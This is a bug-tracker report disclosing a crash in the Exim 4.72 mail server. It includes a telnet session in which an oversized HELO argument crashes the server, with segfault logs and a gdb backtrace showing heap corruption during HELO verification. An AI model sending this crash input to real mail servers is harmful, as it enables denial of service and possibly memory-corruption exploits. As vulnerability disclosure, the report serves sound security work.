http://bugs.exim.org/show_bug.cgi?id=1580
Summary: 【remote exec vulnerability】
Product: Exim
Version: 4.72
Platform: Other
OS/Version: Windows
Status: NEW
Severity: security
Priority: critical
Component: Eximon
AssignedTo: nigel@???
ReportedBy: luodalongde@???
CC: exim-dev@???
Created an attachment (id=785) --> (http://bugs.exim.org/attachment.cgi?id=785)
conf file
This is a remote code exec vulnerability.
Crash report:
Jan 29 00:55:13 localhost kernel: exim[25432]: segfault at 18 ip 00007fcb67c254fd sp 00007fff66f272b0 error 4 in libc-2.12.so[7fcb67bad000+18a000]
Jan 29 00:58:45 localhost kernel: exim[25471]: segfault at 18 ip 00007feae99034fd sp 00007ffff8aefaf0 error 4 in libc-2.12.so[7feae988b000+18a000]
If the client does the following, the server will crash:
[root@localhost ~]# telnet 192.168.77.98 25
Trying 192.168.77.98...
Connected to 192.168.77.98.
Escape character is '^]'.
220 localhost.localdomain ESMTP Exim 4.72 Thu, 29 Jan 2015 01:01:15 +0800
127.0.0.1
500 unrecognized command
helo
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Connection closed by foreign host.
Debug info:
(gdb) bt
#0 0x00007f840a11a625 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1 0x00007f840a11be05 in abort () at abort.c:92
#2 0x00007f840a158537 in __libc_message (do_abort=2, fmt=0x7f840a240900 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:198
#3 0x00007f840a15de66 in malloc_printerr (action=3, str=0x7f840a240c00 "free(): invalid next size (normal)", ptr=<value optimized out>) at malloc.c:6336
#4 0x00007f840a1609b3 in _int_free (av=0x7f840a477e80, p=0x7f840de4d8b0, have_lock=0) at malloc.c:4832
#5 0x00007f840a14e4cd in _IO_new_fclose (fp=0x7f840de4d8c0) at iofclose.c:88
#6 0x00007f840ca37e7d in os_find_running_interfaces_linux () at os.c:148
#7 0x00007f840ca2f01d in host_find_interfaces () at host.c:834
#8 0x00007f840ca2f27b in host_scan_for_local_hosts (host=<value optimized out>, lastptr=0x7fff2d907110, removed=0x0) at host.c:1328
#9 0x00007f840ca2f821 in host_find_byname (host=0x7fff2d907160, ignore_target_hosts=0x0, flags=<value optimized out>, fully_qualified_name=0x0, local_host_check=1) at host.c:2109
#10 0x00007f840ca58120 in smtp_verify_helo () at smtp_in.c:2492
#11 0x00007f840ca5a8d4 in smtp_setup_msg () at smtp_in.c:2919
#12 0x00007f840ca05ade in handle_smtp_call () at daemon.c:506
#13 daemon_go () at daemon.c:1875
#14 0x00007f840ca192ac in main (argc=3, cargv=<value optimized out>) at exim.c:4262